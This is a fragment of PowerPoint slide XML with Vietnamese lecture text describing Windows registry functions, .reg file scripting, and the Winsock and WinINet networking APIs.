              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>giá</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>vào</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thanh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ghi</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>RegGetValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Lấy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>giá</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thanh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ghi</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3333493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Registry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Ví</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dụ</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7820025" cy="493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73736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Registry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Registry Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>bằng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Thanh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ghi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>sẽ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tự</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>động</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nhật</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>khi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> double-click </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>vào</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>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931" y="2708921"/>
            <a:ext cx="6668138" cy="150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59820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API</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> Windows API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>vụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mạng</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Berkeley compatible sockets: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>viện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Winsocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>ws2_32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>ocket, connect, bind, listen, accept, send, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>recv</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thường</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hàm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>WSAtartup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>gọi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trước</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>khi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hàm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> networking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tiếp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>theo</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Mô</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>kết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> Server – Client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thường</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>sử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dụng</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16708501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Networking API</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Ví</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dụ</a:t>
            </a:r>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198" y="1196752"/>
            <a:ext cx="5040560" cy="550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51237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Networking API</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>WinINet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>bậc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Chứa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>viện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>Wininet.dll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>giao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thức</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> ở </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lớp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ứng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dụng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>như</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> HTTP, FTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>InternetOpen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>khởi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tạo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>kết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>InternetOpenUrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>kết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>InternetReadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đọc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> 1 file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>từ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
